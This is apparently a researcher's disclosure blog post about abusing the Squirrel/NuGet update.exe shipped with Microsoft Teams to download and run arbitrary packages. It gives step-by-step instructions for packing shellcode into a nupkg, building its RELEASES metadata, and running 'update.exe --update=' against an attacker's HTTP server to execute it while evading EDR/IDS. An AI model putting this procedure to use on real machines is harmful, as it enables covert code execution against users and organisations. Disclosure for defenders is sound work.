Nuget/Squirrel uncontrolled endpoints leads to arbitrary code execution

Update :2-July-2019


When i was researching Microsoft ‘Teams,’ I came across an interesting argument ‘update’, I got to know from Squirrel documentation that this command will download and execute the respective Nuget package automatically, I was like why Microsoft has this feature? can i exploit this?

The Package creation was bit challenging one, It took some hours to figure out how easy it is, Then i tried to create a reverse shell , tried the update command from Microsoft Teams and voila! I got a reverse shell.

I reported to Microsoft and they are not bad, they responded to me and validated the vulnerable endpoint and postponed the fix to future release, I was waiting for the fix so i can make it release publicly.

But, Of-course most of them hunting for the exploits and doing good for the community to protect from adversaries, I got an update in my Twitter that another researcher https://twitter.com/MrUn1k0d3r released similar vulnerable endpoint in Microsoft Teams that also from ‘update.exe’ , Got an update that https://twitter.com/Hexacorn also researched about Squirrel packages initially , The both researchers did a fantastic work on this, So i decided finally to make it public since i spent most of the time in this and without fixing this, the adversaries/insiders likely use this technique for EDR/IDS evasion, So this post will make the blueteam-defense team aware of this situation.

Vulnerable Endpoints :



Payload creation :

Payload preparation:

  1. extract any nupkg package, in my example Exploit-1.5.60-full.nupkg
  2. goto Exploit-1.5.60-full\lib\net45 and drop your shellcode as ‘squirrel.exe’
    compress the complete folder as ‘Exploit-1.5.60-full.nupkg’
  3. Calculate the metadata with below command.
    sha1sum Exploit-1.5.60-full.nupkg && wc -c < Exploit-1.5.60-full.nupkg
    Output : fa8b87f0b995498a6e890c832dcaf968997608d4 Exploit-1.5.60-full.nupkg 4695
  4. create a file named RELEASES and copy the above output and save.
    So the main directory contains 2 file Exploit-1.5.60-full.nupkg and RELEASES.
  5. upload to any http server.

How to attack :

  1. Download and execute:

Step 1: Go to target application folder, So go to “%localappdata%[application Folder]”
Step 2: Run the below command,
update.exe — update=[http server contains the above 2 files]
E.g update.exe — update=

Now the update command will download the malicious package and install automatically.

2. Download :

Image for post
Image for post
Image for post
Image for post

update.exe — download=[http server contains the above 2 files]

It will download the package containing shellcode to “packages” folder.

What is the impact?

  1. Malicious code execution from Microsoft legitimate binary (Living off the Land)
  2. No special privilege required, just a standard windows user can able to exploit this.
  3. RedTeam/Insiders will use this evade EDR/IDS.
  4. Privilege escalation happens, if the application has control of SYSTEM files.

What is the Issue?

  1. There is no controlled design that application to update from authenticated URL.
  2. Allowing 3rd party url to download the package.
  3. I would not say the issue with Squirrel application design, but Developers might redact the unwanted arguments and push automatic updates.

LOLBAS/LOLBINS contributions:

Written by

#800080 Teamer | Threat Researcher | Malware analyst | Reverse Engineer

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store